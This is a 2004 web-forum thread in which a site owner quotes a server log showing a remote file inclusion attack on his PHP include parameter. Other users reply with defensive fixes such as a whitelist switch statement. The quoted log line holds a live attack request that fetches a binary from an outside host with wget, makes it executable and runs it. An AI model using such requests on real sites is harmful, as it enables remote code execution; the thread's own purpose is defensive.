Page 1 of 1

Security help needed for includes

Posted: Sat Jul 03, 2004 9:02 am
by J Reid
Hi all,

I got an email from my hosting company saying that they had found someone using my site, and my handwritten code, to try and hack into their servers. I have only a basic understanding of what is being exploited and want some advice on how to prevent it.

Below is some of the server log that was emailed to me. Basically I need to secure my includes. Apparently this is not too difficult.

Code: Select all

www.sharperstill.com 200.158.8.123 - - ї28/Jun/2004:10:46:15 +1000] "GET
/index.php?include=http://www.h4ckbr.org/php.gif?&cmd=cd%20/var/tmp;wget%20h
ttp://h4ckbr.org/bd/44464;chmod%20777%2044464;./44464 HTTP/1.1" 200 4197 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Jon

Posted: Sat Jul 03, 2004 9:08 am
by feyd
you could switch to a system that doesn't use the url to pass the whole filename, or any part of the filename for the include..

Can you elaborate

Posted: Sat Jul 03, 2004 9:40 am
by J Reid
I'm not sure what my options are......

Posted: Sat Jul 03, 2004 9:48 am
by feyd
well.. consider the "include" parameter you have as a mode identifier..

so
/index.php?include=members
could correspond to memberinfo.inc.php
and
/index.php?include=threads
could correspond to viewthreads.inc.php

you can achieve this with a switch statement:

Code: Select all

<?php

$include = (!empty($_GET['include']) ? $_GET['include'] : '');
switch($include)
{
  case 'members':
  $include = 'inc/memberinfo.php';
  break;

  case 'threads':
  $include = 'inc/viewthreads.php';
  break;

  default:
  $include = 'inc/mainpage.php';
  break;
}

include $include;

?>

Posted: Sat Jul 03, 2004 9:49 am
by qads
put all the include files in 1 folder, then use a script to load all the file names in a array, or if youdont have many files, just put the names in the array your self, then get the file name from the url, check the array to see if it exists, if so, include it, else include a error page.

OR

get the file name from the url, use [php_man]file_exists[/php_man] function to see if file exists, if it does, include, else include error page.

OK

Posted: Sat Jul 03, 2004 9:53 am
by J Reid
I can kind of follow that, except I'm not sure how that doesn't use the URL to send the mode identifier.....

Posted: Sat Jul 03, 2004 9:59 am
by feyd
it does use the url, but doesn't require it. But it doesn't directly use the url in the filename to use. This seperation, and the use of a default value, are the major security things this snippet does.

Posted: Sat Jul 03, 2004 3:28 pm
by John Cartwright
if you main index page has calls in subpages withen itself you could do this

index.php

Code: Select all

<?php

define("IN_SITE",true);

?>
then on each of your inner pages ( eg. members.php )

Code: Select all

<?php

if (!defined("IN_SITE")
{
exit("You cannot access the page directly");
}

?>

Posted: Sat Jul 03, 2004 7:46 pm
by J Reid
My main index page looks for an inclusion, and if it doesn't find one it includes a default making my true index page. If it does find one then it loads that one making a page for contacting me via email. So there are only two includes. The only other page on my site - photo.php - uses the url to pass along variables for extracting the next image from the db etc...

Jon